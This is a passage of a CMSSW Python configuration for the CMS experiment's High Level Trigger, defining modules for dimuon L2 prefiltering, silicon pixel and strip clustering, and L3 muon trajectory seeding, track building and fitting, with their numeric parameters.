)\n)\nhltDimuonL2PreFiltered0 = cms.EDFilter( \"HLTMuonL2PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL1Filtered0\" ),\n SeedMapTag = cms.InputTag( \"hltL2Muons\" ),\n MinN = cms.int32( 2 ),\n MaxEta = cms.double( 2.5 ),\n MaxDr = cms.double( 9999.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 0.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( True ),\n AbsEtaBins = cms.vdouble( 5.0 ),\n MinNstations = cms.vint32( 0 ),\n MinNhits = cms.vint32( 0 )\n)\nhltSiPixelDigis = cms.EDProducer( \"SiPixelRawToDigi\",\n IncludeErrors = cms.bool( False ),\n UseQualityInfo = cms.bool( False ),\n UseCablingTree = cms.untracked.bool( True ),\n Timing = cms.untracked.bool( False ),\n InputLabel = cms.InputTag( \"rawDataCollector\" )\n)\nhltSiPixelClusters = cms.EDProducer( \"SiPixelClusterProducer\",\n src = cms.InputTag( \"hltSiPixelDigis\" ),\n maxNumberOfClusters = cms.int32( 12000 ),\n payloadType = cms.string( \"HLT\" ),\n ClusterMode = cms.untracked.string( \"PixelThresholdClusterizer\" ),\n ChannelThreshold = cms.int32( 1000 ),\n SeedThreshold = cms.int32( 1000 ),\n ClusterThreshold = cms.double( 4000.0 ),\n VCaltoElectronGain = cms.int32( 65 ),\n VCaltoElectronOffset = cms.int32( -414 ),\n MissCalibrate = cms.untracked.bool( True ),\n SplitClusters = cms.bool( False )\n)\nhltSiPixelRecHits = cms.EDProducer( \"SiPixelRecHitConverter\",\n src = cms.InputTag( \"hltSiPixelClusters\" ),\n VerboseLevel = cms.untracked.int32( 0 ),\n CPE = cms.string( \"hltESPPixelCPEGeneric\" )\n)\nhltSiStripExcludedFEDListProducer = cms.EDProducer( \"SiStripExcludedFEDListProducer\",\n ProductLabel = cms.InputTag( \"rawDataCollector\" )\n)\nhltSiStripRawToClustersFacility = cms.EDProducer( \"SiStripRawToClusters\",\n ProductLabel = cms.InputTag( \"rawDataCollector\" ),\n Clusterizer = cms.PSet( \n ChannelThreshold = cms.double( 2.0 ),\n MaxSequentialBad = cms.uint32( 1 ),\n MaxSequentialHoles = cms.uint32( 0 ),\n Algorithm = cms.string( \"ThreeThresholdAlgorithm\" ),\n MaxAdjacentBad = cms.uint32( 0 ),\n QualityLabel = cms.string( \"\" ),\n SeedThreshold = cms.double( 3.0 ),\n ClusterThreshold = cms.double( 5.0 ),\n setDetId = cms.bool( True )\n ),\n Algorithms = cms.PSet( \n SiStripFedZeroSuppressionMode = cms.uint32( 4 ),\n CommonModeNoiseSubtractionMode = cms.string( \"Median\" ),\n PedestalSubtractionFedMode = cms.bool( True ),\n TruncateInSuppressor = cms.bool( True ),\n doAPVRestore = cms.bool( True ),\n useCMMeanMap = cms.bool( False )\n )\n)\nhltSiStripClusters = cms.EDProducer( \"MeasurementTrackerSiStripRefGetterProducer\",\n InputModuleLabel = cms.InputTag( \"hltSiStripRawToClustersFacility\" ),\n measurementTrackerName = cms.string( \"hltESPMeasurementTracker\" )\n)\nhltL3TrajSeedOIState = cms.EDProducer( \"TSGFromL2Muon\",\n PtCut = cms.double( 1.0 ),\n PCut = cms.double( 2.5 ),\n MuonCollectionLabel = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'hltESPSteppingHelixPropagatorOpposite',\n 'hltESPSteppingHelixPropagatorAlong' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n ),\n MuonTrackingRegionBuilder = cms.PSet( ),\n TkSeedGenerator = cms.PSet( \n propagatorCompatibleName = cms.string( \"hltESPSteppingHelixPropagatorOpposite\" ),\n option = cms.uint32( 3 ),\n maxChi2 = cms.double( 40.0 ),\n errorMatrixPset = cms.PSet( \n atIP = cms.bool( True ),\n action = cms.string( \"use\" ),\n errorMatrixValuesPSet = cms.PSet( \n pf3_V12 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V13 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V11 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n pf3_V14 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V15 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n yAxis = cms.vdouble( 0.0, 1.0, 1.4, 10.0 ),\n pf3_V33 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n zAxis = cms.vdouble( -3.14159, 3.14159 ),\n pf3_V44 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n xAxis = cms.vdouble( 0.0, 13.0, 30.0, 70.0, 1000.0 ),\n pf3_V22 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n pf3_V23 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V45 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V55 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n pf3_V34 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V35 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V25 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V24 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n )\n )\n ),\n propagatorName = cms.string( \"hltESPSteppingHelixPropagatorAlong\" ),\n manySeeds = cms.bool( False ),\n copyMuonRecHit = cms.bool( False ),\n ComponentName = cms.string( \"TSGForRoadSearch\" )\n ),\n TrackerSeedCleaner = cms.PSet( ),\n TSGFromMixedPairs = cms.PSet( ),\n TSGFromPixelTriplets = cms.PSet( ),\n TSGFromPixelPairs = cms.PSet( ),\n TSGForRoadSearchOI = cms.PSet( ),\n TSGForRoadSearchIOpxl = cms.PSet( ),\n TSGFromPropagation = cms.PSet( ),\n TSGFromCombinedHits = cms.PSet( )\n)\nhltL3TrackCandidateFromL2OIState = cms.EDProducer( \"CkfTrajectoryMaker\",\n trackCandidateAlso = cms.bool( True ),\n src = cms.InputTag( \"hltL3TrajSeedOIState\" ),\n TrajectoryBuilder = cms.string( \"hltESPMuonCkfTrajectoryBuilder\" ),\n TrajectoryCleaner = cms.string( \"hltESPTrajectoryCleanerBySharedHits\" ),\n NavigationSchool = cms.string( \"SimpleNavigationSchool\" ),\n RedundantSeedCleaner = cms.string( \"CachingSeedCleanerBySharedInput\" ),\n useHitsSplitting = cms.bool( False ),\n TransientInitialStateEstimatorParameters = cms.PSet( \n propagatorAlongTISE = cms.string( \"PropagatorWithMaterial\" ),\n numberMeasurementsForFit = cms.int32( 4 ),\n propagatorOppositeTISE = cms.string( \"PropagatorWithMaterialOpposite\" )\n ),\n doSeedingRegionRebuilding = cms.bool( False ),\n cleanTrajectoryAfterInOut = cms.bool( False ),\n maxNSeeds = cms.uint32( 100000 )\n)\nhltL3TkTracksFromL2OIState = cms.EDProducer( \"TrackProducer\",\n TrajectoryInEvent = cms.bool( True ),\n useHitsSplitting = cms.bool( False ),\n clusterRemovalInfo = cms.InputTag( \"\" ),\n alias = cms.untracked.string( \"\" ),\n Fitter = cms.string( \"hltESPKFFittingSmoother\" ),\n Propagator = cms.string( \"PropagatorWithMaterial\" ),\n src = cms.InputTag( \"hltL3TrackCandidateFromL2OIState\" ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n AlgorithmName = cms.string( \"undefAlgorithm\" ),\n NavigationSchool = cms.string( \"\" )\n)\nhltL3MuonsOIState = cms.EDProducer( \"L3MuonProducer\",\n MuonCollectionLabel = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),\n L3TrajBuilderParameters = cms.PSet( \n ScaleTECyFactor = cms.double( -1.0 ),\n GlbRefitterParameters = cms.PSet( \n TrackerSkipSection = cms.int32( -1 ),\n DoPredictionsOnly = cms.bool( False ),\n PropDirForCosmics = cms.bool( False ),\n HitThreshold = cms.int32( 1 ),\n MuonHitsOption = cms.int32( 1 ),\n Chi2CutRPC = cms.double( 1.0 ),\n Fitter = cms.string( \"hltESPL3MuKFTrajectoryFitter\" ),\n DTRecSegmentLabel = cms.InputTag( \"hltDt4DSegments\" ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n RefitDirection = cms.string( \"insideOut\" ),\n CSCRecSegmentLabel = cms.InputTag( \"hltCscSegments\" ),\n Chi2CutCSC = cms.double( 150.0 ),\n Chi2CutDT = cms.double( 10.0 ),\n RefitRPCHits = cms.bool( True ),\n SkipStation = cms.int32( -1 ),\n Propagator = cms.string( \"hltESPSmartPropagatorAny\" ),\n TrackerSkipSystem = cms.int32( -1 )\n ),\n ScaleTECxFactor = cms.double( -1.0 ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n MuonTrackingRegionBuilder = cms.PSet( \n EtaR_UpperLimit_Par1 = cms.double( 0.25 ),\n EtaR_UpperLimit_Par2 = cms.double( 0.15 ),\n OnDemand = cms.double( -1.0 ),\n Rescale_Dz = cms.double( 3.0 ),\n vertexCollection = cms.InputTag( \"pixelVertices\" ),\n Rescale_phi = cms.double( 3.0 ),\n Eta_fixed = cms.double( 0.2 ),\n DeltaZ_Region = cms.double( 15.9 ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n PhiR_UpperLimit_Par2 = cms.double( 0.2 ),\n Eta_min = cms.double( 0.05 ),\n Phi_fixed = cms.double( 0.2 ),\n DeltaR = cms.double( 0.2 ),\n EscapePt = cms.double( 1.5 ),\n UseFixedRegion = cms.bool( False ),\n PhiR_UpperLimit_Par1 = cms.double( 0.6 ),\n Rescale_eta = cms.double( 3.0 ),\n Phi_min = cms.double( 0.05 ),\n UseVertex = cms.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" )\n ),\n RefitRPCHits = cms.bool( True ),\n PCut = cms.double( 2.5 ),\n TrackTransformer = cms.PSet( \n DoPredictionsOnly = cms.bool( False ),\n Fitter = cms.string( \"hltESPL3MuKFTrajectoryFitter\" ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n RefitDirection = cms.string( \"insideOut\" ),\n RefitRPCHits = cms.bool( True ),\n Propagator = cms.string( \"hltESPSmartPropagatorAny\" )\n ),\n GlobalMuonTrackMatcher = cms.PSet( \n Pt_threshold1 = cms.double( 0.0 ),\n DeltaDCut_3 = cms.double( 15.0 ),\n MinP = cms.double( 2.5 ),\n MinPt = cms.double( 1.0 ),\n Chi2Cut_1 = cms.double( 50.0 ),\n Pt_threshold2 = cms.double( 9.99999999E8 ),\n LocChi2Cut = cms.double( 0.0010 ),\n Eta_threshold = cms.double( 1.2 ),\n Quality_3 = cms.double( 7.0 ),\n Quality_2 = cms.double( 15.0 ),\n Chi2Cut_2 = cms.double( 50.0 ),\n Chi2Cut_3 = cms.double( 200.0 ),\n DeltaDCut_1 = cms.double( 40.0 ),\n DeltaRCut_2 = cms.double( 0.2 ),\n DeltaRCut_3 = cms.double( 1.0 ),\n DeltaDCut_2 = cms.double( 10.0 ),\n DeltaRCut_1 = cms.double( 0.1 ),\n Propagator = cms.string( \"hltESPSmartPropagator\" ),\n Quality_1 = cms.double( 20.0 )\n ),\n PtCut = cms.double( 1.0 ),\n TrackerPropagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n tkTrajLabel = cms.InputTag( \"hltL3TkTracksFromL2OIState\" )\n ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'hltESPSmartPropagatorAny',\n 'SteppingHelixPropagatorAny',\n 'hltESPSmartPropagator',\n 'hltESPSteppingHelixPropagatorOpposite' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n ),\n TrackLoaderParameters = cms.PSet( \n PutTkTrackIntoEvent = cms.untracked.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n SmoothTkTrack = cms.untracked.bool( False ),\n MuonSeededTracksInstance = cms.untracked.string( \"L2Seeded\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n MuonUpdatorAtVertexParameters = cms.PSet( \n MaxChi2 = cms.double( 1000000.0 ),\n Propagator = cms.string( \"hltESPSteppingHelixPropagatorOpposite\" ),\n BeamSpotPositionErrors = cms.vdouble( 0.1, 0.1, 5.3 )\n ),\n VertexConstraint = cms.bool( False ),\n DoSmoothing = cms.bool( True )\n )\n)\nhltL3TrajSeedOIHit = cms.EDProducer( \"TSGFromL2Muon\",\n PtCut = cms.double( 1.0 ),\n PCut = cms.double( 2.5 ),\n MuonCollectionLabel = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'PropagatorWithMaterial',\n 'hltESPSmartPropagatorAnyOpposite' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n ),\n MuonTrackingRegionBuilder = cms.PSet( ),\n TkSeedGenerator = cms.PSet( \n PSetNames = cms.vstring( 'skipTSG',\n 'iterativeTSG' ),\n L3TkCollectionA = cms.InputTag( \"hltL3MuonsOIState\" ),\n iterativeTSG = cms.PSet( \n ErrorRescaling = cms.double( 3.0 ),\n beamSpot = cms.InputTag( \"offlineBeamSpot\" ),\n MaxChi2 = cms.double( 40.0 ),\n errorMatrixPset = cms.PSet( \n atIP = cms.bool( True ),\n action = cms.string( \"use\" ),\n errorMatrixValuesPSet = cms.PSet( \n pf3_V12 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V13 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V11 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n pf3_V14 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V15 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n yAxis = cms.vdouble( 0.0, 1.0, 1.4, 10.0 ),\n pf3_V33 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n zAxis = cms.vdouble( -3.14159, 3.14159 ),\n pf3_V44 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n xAxis = cms.vdouble( 0.0, 13.0, 30.0, 70.0, 1000.0 ),\n pf3_V22 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n pf3_V23 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V45 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V55 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n pf3_V34 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V35 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V25 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V24 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n )\n )\n ),\n UpdateState = cms.bool( True ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n SelectState = cms.bool( False ),\n SigmaZ = cms.double( 25.0 ),\n ResetMethod = cms.string( \"matrix\" ),\n ComponentName = cms.string( \"TSGFromPropagation\" ),\n UseVertexState = cms.bool( True ),\n Propagator = cms.string( \"hltESPSmartPropagatorAnyOpposite\" )\n ),\n skipTSG = cms.PSet( ),\n ComponentName = cms.string( \"DualByL2TSG\" )\n ),\n TrackerSeedCleaner = cms.PSet( \n cleanerFromSharedHits = cms.bool( True ),\n ptCleaner = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n directionCleaner = cms.bool( True )\n ),\n TSGFromMixedPairs = cms.PSet( ),\n TSGFromPixelTriplets = cms.PSet( ),\n TSGFromPixelPairs = cms.PSet( ),\n TSGForRoadSearchOI = cms.PSet( ),\n TSGForRoadSearchIOpxl = cms.PSet( ),\n TSGFromPropagation = cms.PSet( ),\n TSGFromCombinedHits = cms.PSet( )\n)\nhltL3TrackCandidateFromL2OIHit = cms.EDProducer( \"CkfTrajectoryMaker\",\n trackCandidateAlso = cms.bool( True ),\n src = cms.InputTag( \"hltL3TrajSeedOIHit\" ),\n TrajectoryBuilder = cms.string( \"hltESPMuonCkfTrajectoryBuilder\" ),\n TrajectoryCleaner = cms.string( \"hltESPTrajectoryCleanerBySharedHits\" ),\n NavigationSchool = cms.string( \"SimpleNavigationSchool\" ),\n RedundantSeedCleaner = cms.string( \"CachingSeedCleanerBySharedInput\" ),\n useHitsSplitting = cms.bool( False ),\n TransientInitialStateEstimatorParameters = cms.PSet( \n propagatorAlongTISE = cms.string( \"PropagatorWithMaterial\" ),\n numberMeasurementsForFit = cms.int32( 4 ),\n propagatorOppositeTISE = cms.string( \"PropagatorWithMaterialOpposite\" )\n ),\n doSeedingRegionRebuilding = cms.bool( False ),\n cleanTrajectoryAfterInOut = cms.bool( False ),\n maxNSeeds = cms.uint32( 100000 )\n)\nhltL3TkTracksFromL2OIHit = cms.EDProducer( \"TrackProducer\",\n TrajectoryInEvent = cms.bool( True ),\n useHitsSplitting = cms.bool( False ),\n clusterRemovalInfo = cms.InputTag( \"\" ),\n alias = cms.untracked.string( \"\" ),\n Fitter = cms.string( \"hltESPKFFittingSmoother\" ),\n Propagator = cms.string( \"PropagatorWithMaterial\" ),\n src = cms.InputTag( \"hltL3TrackCandidateFromL2OIHit\" ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n AlgorithmName = cms.string( \"undefAlgorithm\" ),\n NavigationSchool = cms.string( \"\" )\n)\nhltL3MuonsOIHit = cms.EDProducer( \"L3MuonProducer\",\n MuonCollectionLabel = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),\n L3TrajBuilderParameters = cms.PSet( \n ScaleTECyFactor = cms.double( -1.0 ),\n GlbRefitterParameters = cms.PSet( \n TrackerSkipSection = cms.int32( -1 ),\n DoPredictionsOnly = cms.bool( False ),\n PropDirForCosmics = cms.bool( False ),\n HitThreshold = cms.int32( 1 ),\n MuonHitsOption = cms.int32( 1 ),\n Chi2CutRPC = cms.double( 1.0 ),\n Fitter = cms.string( \"hltESPL3MuKFTrajectoryFitter\" ),\n DTRecSegmentLabel = cms.InputTag( \"hltDt4DSegments\" ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n RefitDirection = cms.string( \"insideOut\" ),\n CSCRecSegmentLabel = cms.InputTag( \"hltCscSegments\" ),\n Chi2CutCSC = cms.double( 150.0 ),\n Chi2CutDT = cms.double( 10.0 ),\n RefitRPCHits = cms.bool( True ),\n SkipStation = cms.int32( -1 ),\n Propagator = cms.string( \"hltESPSmartPropagatorAny\" ),\n TrackerSkipSystem = cms.int32( -1 )\n ),\n ScaleTECxFactor = cms.double( -1.0 ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n MuonTrackingRegionBuilder = cms.PSet( \n EtaR_UpperLimit_Par1 = cms.double( 0.25 ),\n EtaR_UpperLimit_Par2 = cms.double( 0.15 ),\n OnDemand = cms.double( -1.0 ),\n Rescale_Dz = cms.double( 3.0 ),\n vertexCollection = cms.InputTag( \"pixelVertices\" ),\n Rescale_phi = cms.double( 3.0 ),\n Eta_fixed = cms.double( 0.2 ),\n DeltaZ_Region = cms.double( 15.9 ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n PhiR_UpperLimit_Par2 = cms.double( 0.2 ),\n Eta_min = cms.double( 0.05 ),\n Phi_fixed = cms.double( 0.2 ),\n DeltaR = cms.double( 0.2 ),\n EscapePt = cms.double( 1.5 ),\n UseFixedRegion = cms.bool( False ),\n PhiR_UpperLimit_Par1 = cms.double( 0.6 ),\n Rescale_eta = cms.double( 3.0 ),\n Phi_min = cms.double( 0.05 ),\n UseVertex = cms.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" )\n ),\n RefitRPCHits = cms.bool( True ),\n PCut = cms.double( 2.5 ),\n TrackTransformer = cms.PSet( \n DoPredictionsOnly = cms.bool( False ),\n Fitter = cms.string( \"hltESPL3MuKFTrajectoryFitter\" ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n RefitDirection = cms.string( \"insideOut\" ),\n RefitRPCHits = cms.bool( True ),\n Propagator = cms.string( \"hltESPSmartPropagatorAny\" )\n ),\n GlobalMuonTrackMatcher = cms.PSet( \n Pt_threshold1 = cms.double( 0.0 ),\n DeltaDCut_3 = cms.double( 15.0 ),\n MinP = cms.double( 2.5 ),\n MinPt = cms.double( 1.0 ),\n Chi2Cut_1 = cms.double( 50.0 ),\n Pt_threshold2 = cms.double( 9.99999999E8 ),\n LocChi2Cut = cms.double( 0.0010 ),\n Eta_threshold = cms.double( 1.2 ),\n Quality_3 = cms.double( 7.0 ),\n Quality_2 = cms.double( 15.0 ),\n Chi2Cut_2 = cms.double( 50.0 ),\n Chi2Cut_3 = cms.double( 200.0 ),\n DeltaDCut_1 = cms.double( 40.0 ),\n DeltaRCut_2 = cms.double( 0.2 ),\n DeltaRCut_3 = cms.double( 1.0 ),\n DeltaDCut_2 = cms.double( 10.0 ),\n DeltaRCut_1 = cms.double( 0.1 ),\n Propagator = cms.string( \"hltESPSmartPropagator\" ),\n Quality_1 = cms.double( 20.0 )\n ),\n PtCut = cms.double( 1.0 ),\n TrackerPropagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n tkTrajLabel = cms.InputTag( \"hltL3TkTracksFromL2OIHit\" )\n ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'hltESPSmartPropagatorAny',\n 'SteppingHelixPropagatorAny',\n 'hltESPSmartPropagator',\n 'hltESPSteppingHelixPropagatorOpposite' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n ),\n TrackLoaderParameters = cms.PSet( \n PutTkTrackIntoEvent = cms.untracked.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n SmoothTkTrack = cms.untracked.bool( False ),\n MuonSeededTracksInstance = cms.untracked.string( \"L2Seeded\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n MuonUpdatorAtVertexParameters = cms.PSet( \n MaxChi2 = cms.double( 1000000.0 ),\n Propagator = cms.string( \"hltESPSteppingHelixPropagatorOpposite\" ),\n BeamSpotPositionErrors = cms.vdouble( 0.1, 0.1, 5.3 )\n ),\n VertexConstraint = cms.bool( False ),\n DoSmoothing = cms.bool( True )\n )\n)\nhltL3TkFromL2OICombination = cms.EDProducer( \"L3TrackCombiner\",\n labels = cms.VInputTag( 'hltL3MuonsOIState','hltL3MuonsOIHit' )\n)\nhltL3TrajSeedIOHit = cms.EDProducer( \"TSGFromL2Muon\",\n PtCut = cms.double( 1.0 ),\n PCut = cms.double( 2.5 ),\n MuonCollectionLabel = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'PropagatorWithMaterial' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n ),\n MuonTrackingRegionBuilder = cms.PSet( \n EtaR_UpperLimit_Par1 = cms.double( 0.25 ),\n EtaR_UpperLimit_Par2 = cms.double( 0.15 ),\n OnDemand = cms.double( -1.0 ),\n Rescale_Dz = cms.double( 3.0 ),\n vertexCollection = cms.InputTag( \"pixelVertices\" ),\n Rescale_phi = cms.double( 3.0 ),\n Eta_fixed = cms.double( 0.2 ),\n DeltaZ_Region = cms.double( 15.9 ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n PhiR_UpperLimit_Par2 = cms.double( 0.2 ),\n Eta_min = cms.double( 0.1 ),\n Phi_fixed = cms.double( 0.2 ),\n DeltaR = cms.double( 0.2 ),\n EscapePt = cms.double( 1.5 ),\n UseFixedRegion = cms.bool( False ),\n PhiR_UpperLimit_Par1 = cms.double( 0.6 ),\n Rescale_eta = cms.double( 3.0 ),\n Phi_min = cms.double( 0.1 ),\n UseVertex = cms.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" )\n ),\n TkSeedGenerator = cms.PSet( \n PSetNames = cms.vstring( 